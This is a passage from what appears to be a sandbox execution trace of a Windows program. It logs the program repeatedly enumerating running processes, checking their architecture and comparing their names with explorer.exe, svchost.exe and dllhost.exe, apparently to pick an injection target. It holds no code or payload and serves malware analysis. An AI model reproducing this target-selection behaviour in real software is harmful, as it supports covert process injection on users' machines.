cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0258.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0258.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.604] CloseHandle (hObject=0xec) returned 1 [0258.604] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0258.604] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0258.604] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0258.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0258.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0258.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.605] CloseHandle (hObject=0xec) returned 1 [0258.605] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0258.605] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0258.605] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0258.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0258.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0258.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.605] CloseHandle (hObject=0xec) returned 1 [0258.606] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0258.606] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0258.606] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0258.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0258.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0258.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.606] CloseHandle (hObject=0xec) returned 1 [0258.606] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0258.606] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0258.606] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0258.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0258.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0258.607] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.607] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.607] CloseHandle (hObject=0xec) returned 1 [0258.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0258.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0258.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0258.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0258.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0258.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.608] CloseHandle (hObject=0xec) returned 1 [0258.608] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0258.608] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0258.608] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0258.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0258.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0258.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.608] CloseHandle (hObject=0xec) returned 1 [0258.608] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0258.608] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0258.608] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0258.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0258.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0258.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.609] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.609] CloseHandle (hObject=0xec) returned 1 [0258.609] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0258.609] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0258.609] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0258.609] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0258.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0258.610] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.610] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.610] CloseHandle (hObject=0xec) returned 1 [0258.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0258.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0258.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0258.610] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0258.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0258.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.611] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.611] CloseHandle (hObject=0xec) returned 1 [0258.611] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0258.611] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0258.611] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0258.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0258.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0258.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.611] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.611] CloseHandle (hObject=0xec) returned 1 [0258.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0258.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0258.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0258.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0258.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0258.612] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.612] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.612] CloseHandle (hObject=0xec) returned 1 [0258.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0258.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0258.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0258.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0258.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0258.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.613] CloseHandle (hObject=0xec) returned 1 [0258.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0258.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0258.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0258.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0258.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0258.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.614] CloseHandle (hObject=0xec) returned 1 [0258.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0258.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0258.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0258.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0258.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0258.614] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.614] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.614] CloseHandle (hObject=0xec) returned 1 [0258.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0258.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0258.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0258.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0258.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0258.615] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.615] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.615] CloseHandle (hObject=0xec) returned 1 [0258.615] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0258.615] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0258.615] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0258.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0258.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0258.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0258.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0258.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0258.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0258.618] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.618] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.618] CloseHandle (hObject=0xec) returned 1 [0258.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0258.619] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.619] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.619] CloseHandle (hObject=0xec) returned 1 [0258.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0258.619] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.619] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.619] CloseHandle (hObject=0xec) returned 1 [0258.619] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0258.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0258.620] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.620] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.620] CloseHandle (hObject=0xec) returned 1 [0258.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0258.621] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.621] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.621] CloseHandle (hObject=0xec) returned 1 [0258.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0258.622] CloseHandle (hObject=0xe8) returned 1 [0258.622] Sleep (dwMilliseconds=0x3e8) [0259.648] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0259.649] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0259.650] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0259.650] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0259.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0259.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0259.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0259.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0259.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0259.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0259.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0259.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0259.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0259.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0259.656] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 